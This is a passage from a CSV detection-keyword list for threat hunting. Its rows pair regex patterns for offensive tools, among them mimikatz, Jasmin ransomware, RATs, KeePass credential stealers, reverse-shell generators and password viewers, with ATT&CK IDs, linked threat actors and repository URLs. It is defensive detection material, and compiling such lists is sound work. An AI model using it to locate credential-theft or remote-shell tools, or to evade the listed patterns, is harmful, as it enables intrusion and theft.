RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","0","#companyname","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","20414" "*>-Infected Systems Database-</span>*",".{0,1000}\>\-Infected\sSystems\sDatabase\-\<\/span\>.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","20415" "*>Jasmin Encryptor<*",".{0,1000}\>Jasmin\sEncryptor\<.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","20418" "*>Jasmin Ransomware</div>*",".{0,1000}\>Jasmin\sRansomware\<\/div\>.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","20419" "*>JSP Backdoor Reverse Shell<*",".{0,1000}\>JSP\sBackdoor\sReverse\sShell\<.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","20421" 
"*>KeeFarceDLL<*",".{0,1000}\>KeeFarceDLL\<.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","20422" "*>KeeTheft<*",".{0,1000}\>KeeTheft\<.{0,1000}","offensive_tool_keyword","KeeTheft","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20423" "*>KeeTheft<*",".{0,1000}\>KeeTheft\<.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","20424" "*>KeeTheft<*",".{0,1000}\>KeeTheft\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20425" "*>KerberOPSEC</*",".{0,1000}\>KerberOPSEC\<\/.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","20426" "*>Keylogger<*",".{0,1000}\>Keylogger\<.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#productname","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","20427" "*>KrbRelay<*",".{0,1000}\>KrbRelay\<.{0,1000}","offensive_tool_keyword","KrbRelay","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20428" "*>KrbRelay<*",".{0,1000}\>KrbRelay\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","KrbRelay","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20429" "*>LimeRAT.exe<*",".{0,1000}\>LimeRAT\.exe\<.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","N/A","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","20433" "*>LostMyPassword<*",".{0,1000}\>LostMyPassword\<.{0,1000}","offensive_tool_keyword","LostMyPassword","Nirsoft tool that allows you to recover a lost password if it's stored by a software installed on your system","T1040 - T1003 - T1078 - T1518 - T1555","TA0006 - TA0009 ","N/A","LockBit","Credential Access","https://www.nirsoft.net/alpha/lostmypassword-x64.zip","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20434" "*>Make Me Admin<*",".{0,1000}\>Make\sMe\sAdmin\<.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","20436" "*>MakeMeAdmin<*",".{0,1000}\>MakeMeAdmin\<.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","20437" "*>MDE_Enum<*",".{0,1000}\>MDE_Enum\<.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","N/A","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","20438" "*>mimikatz for Windows<*",".{0,1000}\>mimikatz\sfor\sWindows\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#productname","https://www.virustotal.com/gui/file/3929a5cf7450e6cd0efada336cf89f7a188f0d40e7f4a7a2bff91fd7a30c48b3/details","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20447" "*>mimikatz.exe<*",".{0,1000}\>mimikatz\.exe\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz 
keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#originalfilename","https://www.virustotal.com/gui/file/3929a5cf7450e6cd0efada336cf89f7a188f0d40e7f4a7a2bff91fd7a30c48b3/details","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20448" "*>mimilib.dll<*",".{0,1000}\>mimilib\.dll\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - 
LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#originalfilename","https://www.virustotal.com/gui/file/4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4/behavior","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20449" "*>mimilove for Windows 2000<*",".{0,1000}\>mimilove\sfor\sWindows\s2000\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#description","https://www.virustotal.com/gui/file/4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4/behavior","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20450" 
"*>mimilove<*",".{0,1000}\>mimilove\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#productname","https://www.virustotal.com/gui/file/4ec058080435d27714e38d5544dacafdf3c7739dc3a0615a57cede8c124a9ae4/behavior","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20451" "*>mimispool.dll<*",".{0,1000}\>mimispool\.dll\<.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - 
FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","0","#originalfilename","https://www.virustotal.com/gui/file-analysis/NmFiMjcxYjA4YzVmODg3YTNiMTRhZTc1YmZlY2UwNmU6MTcyNDUyMDAxOA==","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20452" "*>NamedPipeImpersonation<*",".{0,1000}\>NamedPipeImpersonation\<.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20454" "*>NoPowerShell<*",".{0,1000}\>NoPowerShell\<.{0,1000}","offensive_tool_keyword","NoPowerShell","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20462" "*>NoPowerShell<*",".{0,1000}\>NoPowerShell\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - 
T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20463" "*>Nsocks.dll<*",".{0,1000}\>Nsocks\.dll\<.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#originalfilename","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","20464" "*>Nsocks<*",".{0,1000}\>Nsocks\<.{0,1000}","offensive_tool_keyword","nsocks",".NET HttpClient proxy handler implementation for SOCKS proxies","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Scattered Spider* - Black Basta","C2","https://github.com/bbepis/Nsocks","1","0","#productname","N/A","8","10","3","0","2020-06-08T17:25:07Z","2020-03-28T09:00:22Z","20465" "*>Obfuscar Console Utility<*",".{0,1000}\>Obfuscar\sConsole\sUtility\<.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","20466" "*>OperaPassView<*",".{0,1000}\>OperaPassView\<.{0,1000}","offensive_tool_keyword","OperaPassView","OperaPassView is a small password recovery tool that decrypts the content of the Opera Web browser password file (wand.dat) and displays the list of all Web site passwords stored in this file","T1003 - T1555 - T1145","TA0006 - TA0009","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential 
Access","https://www.nirsoft.net/utils/opera_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20468" "*>PassTheCert<*",".{0,1000}\>PassTheCert\<.{0,1000}","offensive_tool_keyword","PassTheCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Black Basta","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20469" "*>PassTheCert<*",".{0,1000}\>PassTheCert\<.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#productname","PassTheCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20470" "*>Password Recovery for Remote Desktop<*",".{0,1000}\>Password\sRecovery\sfor\sRemote\sDesktop\<.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","20471" "*>Password 
Sniffer<*",".{0,1000}\>Password\sSniffer\<.{0,1000}","offensive_tool_keyword","SniffPass","password monitoring software that listens to your network - capture the passwords that pass through your network adapter and display them on the screen instantly","T1040 - T1071 - T1041","TA0006 - TA0007 - TA0009","N/A","GoGoogle - Kimsuky","Credential Access","https://www.nirsoft.net/utils/password_sniffer.html","1","0","#description","N/A","10","10","N/A","N/A","N/A","N/A","20472" "*>PasswordFox<*",".{0,1000}\>PasswordFox\<.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20473" "*>PasswordHashesView<*",".{0,1000}\>PasswordHashesView\<.{0,1000}","offensive_tool_keyword","PasswordHashesView","displays the SHA1 hash and the NTLM hash of the login password for users currently logged into your system","T1003 - T1081","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/alpha/passwordhashesview-x64.zip","1","0","#productname","N/A","10","9","N/A","N/A","N/A","N/A","20474" "*>Password-Recovery For Firefox<*",".{0,1000}\>Password\-Recovery\sFor\sFirefox\<.{0,1000}","offensive_tool_keyword","passwordfox","recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox","T1555.003 - T1003 - T1083","TA0006 ","N/A","LockBit - GoGoogle - 8BASE - XDSpy","Credential Access","https://www.nirsoft.net/utils/passwordfox.html","1","0","#Description","N/A","10","10","N/A","N/A","N/A","N/A","20475" "*>Penetration test tool<*",".{0,1000}\>Penetration\stest\stool\<.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential 
Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#productname","N/A","9","10","N/A","N/A","N/A","N/A","20478" "*>physmem2profit<*",".{0,1000}\>physmem2profit\<.{0,1000}","offensive_tool_keyword","physmem2profit","Physmem2profit can be used to create a minidump of a target hosts' LSASS process by analysing physical memory remotely","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/WithSecureLabs/physmem2profit","1","0","#servicename","N/A","10","5","415","74","2022-07-27T03:33:59Z","2020-02-14T08:34:27Z","20479" "*>PowerShdll<*",".{0,1000}\>PowerShdll\<.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","20482" "*>PrintSpoofer<*",".{0,1000}\>PrintSpoofer\<.{0,1000}","offensive_tool_keyword","PrivFu","ArtsOfGetSystem privesc tools","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","ArtsOfGetSystem","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20483" "*>PWDumpX Service<*",".{0,1000}\>PWDumpX\sService\<.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#servicename","N/A","10","8","N/A","N/A","N/A","N/A","20488" "*>pwnlook35<*",".{0,1000}\>pwnlook35\<.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#companyname","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","20489" "*>RDP Recognizer<*",".{0,1000}\>RDP\sRecognizer\<.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#productname","N/A","9","10","N/A","N/A","N/A","N/A","20493" "*>RegHiveBackup<*",".{0,1000}\>RegHiveBackup\<.{0,1000}","offensive_tool_keyword","RegHiveBackup","backup the Registry files on your system into the specified folder","T1012 - T1596 - T1003","TA0006 - TA0009","N/A","N/A","Collection","https://www.nirsoft.net/alpha/reghivebackup.zip","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A","20495" "*>Remote Desktop PassView<*",".{0,1000}\>Remote\sDesktop\sPassView\<.{0,1000}","offensive_tool_keyword","rdpv","RemoteDesktopPassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","Phobos - GoGoogle - Kimsuky","Credential 
Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","#productname","N/A","8","10","N/A","N/A","N/A","N/A","20497" "*>REPLACE_ME_DummyServiceName<*",".{0,1000}\>REPLACE_ME_DummyServiceName\<.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#servicename","Service Name https://github.com/Pennyw0rth/NetExec/blob/b855dac2b696ea1b744f10a0573c6b394670a5cb/nxc/data/keepass_trigger_module/RestartKeePass.ps1#L4","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","20502" "*>RestoreServiceModificationVariant<*",".{0,1000}\>RestoreServiceModificationVariant\<.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20504" 